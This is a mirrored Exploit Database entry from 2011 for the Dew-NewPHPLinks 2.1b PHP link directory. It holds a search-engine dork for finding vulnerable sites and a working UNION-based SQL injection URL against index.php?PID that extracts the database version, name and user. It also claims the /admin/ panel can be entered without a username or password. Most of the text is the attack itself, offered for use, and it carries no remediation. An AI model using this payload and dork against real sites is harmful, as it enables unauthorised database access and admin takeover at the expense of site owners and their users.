Dew-NewPHPLinks 2.1b – ‘index.php’ SQL Injection

• Exploit Database
• 117 阅读

• 作者： AtT4CKxT3rR0r1ST
  日期： 2011-02-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/16122/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30

  Dew-NewPHPLinks v.2.1b (index.php) Sql Injection Vulnerability ======================================================================   ###################################################################### .:. Author : AtT4CKxT3rR0r1ST[F.Hack@w.cn] .:. Script : http://www.dew-code.com/ .:. Dork : "Powered By Dew-NewPHPLinks v.2.1b" .:. Special Gr34T$ T0 ZaIdOoHxHaCkEr   ######################################################################   ===[ Exploit ]=== First: ======= www.site.com/index.php?PID=9999[Sql Injection]   www.site.com/index.php?PID=9999+and+1=2+union+select+concat(version(),0x3a,database(),0x3a,user()),2   Second: ======= Bypass join Control Admin Go to Control Admin [www.site.com/admin/] Dont Ask Username & Password   ######################################################################   txt